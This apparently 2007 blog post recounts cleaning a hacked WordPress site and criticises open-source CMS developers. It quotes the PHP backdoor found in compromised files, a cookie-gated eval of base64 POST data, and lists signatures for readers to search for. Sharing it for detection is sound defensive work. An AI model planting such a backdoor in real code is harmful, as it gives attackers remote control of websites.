I believe I have corrected/removed the backdoor mechanisms which spammers have been using against the site, but there’s no evidence that the wacky WordPress system the site is now running on doesn’t have other compromised files, as well as the security holes through which the crackers originally got in.

Several compromised files had this line inserted at the beginning,

<?php if(md5($_COOKIE['_wp_debugger'])==”5fd808ac028e5197dd69318e32407eb7″){ eval(base64_decode($_POST['file'])); exit; } ?>

Others were disguised as image files, with file extensions of “pngg” and “jpgg”, and beginning with “

If you want to check your site for similarly compromised files and backdoors, search through your site code for signatures such as “qwerty”, “4008deadb16536f48b84fdc70f194dac”, “find suid files”, “_wp_debugger”, “5fd808ac028e5197dd69318e32407eb7″. The signatures are sure to change, as they’re used to activate the backdoor scripts, but at least you have a way to check current installations for these same spammers.

All in all, an unhealthy state of affairs for the Content Management System (CMS) industry. The market is still up for grabs.

I can appreciate the time and effort invested by those who work on open source projects, but developers who complain that users aren’t migrating to their latest efforts quickly enough are both arrogant and naive. Customers prefer to be able to continue using the data they’ve stored in the current versions to losing them when they migrate to the newer ones. I’m pretty sure it’s the same for OSS users. Much as I love writing code, I have enough to write already thank you very much. And I don’t appreciate having to spelunk through your code to figure out what those data structures you’ve added are supposed to do (”ooh, shiny, new!”) just because you’re too lazy to write the docs (”the code are the docs!”) and impatient to play with your new ideas.

Although the site I inherited from Jesse used a CMS system distinct and incompatible from the one I had selected when I started my own, I didn’t want to switch it around or try doing new things with it because I felt the continuity was better than taking the time to rebuild a site from scratch. But now I can appreciate Jesse’s decision to do such a thing. If I have to spend the downtime upgrading parts that already work well just to get the features needed for other modules, I might as well fix it to my own needs and ignore the chaos that OSS developers are creating in the system. Now the whole NIH question is thrown out the window. It’s no longer a matter of, “Oh, I can do a cooler system.” Now it’s a question of the developers themselves causing users to abandon their system. A question of distrust and self-preservation.

Hopefully, any remaining misconfigurations in the website will be rectified before a second person notices it.

If you sent an email in the past 24 hours (of 2007-12-05) and you haven’t gotten a response already I apologize, but you’ll need to resend it. My site host doesn’t transfer files, emails, settings, or the like between accounts; and well, it has probably been crushed by the lumbering floes. In fact, if you’re waiting for a response from me on any matter, please jog my memory with another email.

Anyway, at least the site now has some breathing room, and I can continue improving the products.